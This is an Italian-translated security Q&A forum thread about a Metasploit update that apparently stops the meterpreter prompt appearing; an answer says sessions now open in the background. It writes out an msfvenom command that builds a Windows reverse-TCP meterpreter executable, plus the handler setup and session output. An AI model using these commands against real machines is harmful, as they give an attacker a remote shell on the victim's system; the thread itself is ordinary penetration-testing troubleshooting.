Aggiornamento di Metasploit Database Breaks Meterpreter Payload

2

Questo potrebbe essere meglio pubblicato sul forum R7, ma sento che potrei ottenere una risposta più rapida qui mentre aspetto di accedere ai post nei loro forum.

Su un'installazione di base di Kali (versione di Metasploit 4.14.10-dev) il mio payload meterpreter funziona come un incantesimo.

La generazione del payload avviene con il seguente comando

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.10.95 lport=443 -f exe -o shell.exe

Risultato con la versione di Metasploit 4.14.10-dev

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp 
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.10.95:443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:52:45 -0400

meterpreter > 

Se aggiorno il database con msfupdate e aggiorno alla versione 4.15.8-dev il risultato è simile al precedente, ma il prompt meterpreter > non si attiva mai ei comandi non vengono eseguiti.

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp 
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.10.95:443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:54:45 -0400

Qualcun altro l'ha mai incontrato prima di & sai come risolvere?

EDIT:

Output di show advanced

msf exploit(handler) > show advanced

Module advanced options (exploit/multi/handler):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           false            yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session


Payload advanced options (windows/x64/meterpreter_reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoVerifySession            true             yes       Automatically verify and drop invalid sessions
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StagerRetryCount             10               yes       The number of connection attempts to try before exiting the process
   StagerRetryWait              5.0              no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

In risposta a void_in, sembra che la sessione meterpreter non si apra completamente. Non riesco a interagire con le sessioni o sullo sfondo di un'attività.

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.10.95:443 
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:53518) at 2017-08-28 09:03:41 -0400
sessions -l
background
    
posta DKNUCKLES 27.08.2017 - 17:55
fonte

1 risposta

2

La sessione Meterpreter è aperta. Tutto ciò che devi fare è eseguire sessions -l per visualizzare tutti gli ID di sessione e quindi interagire con uno fino a sessions -i <id> . Un recente aggiornamento ha reso l'exploit -j (esegui exploit come lavori) come comportamento predefinito, motivo per cui le sessioni vengono create in background

    
risposta data 28.08.2017 - 08:40
fonte

Leggi altre domande sui tag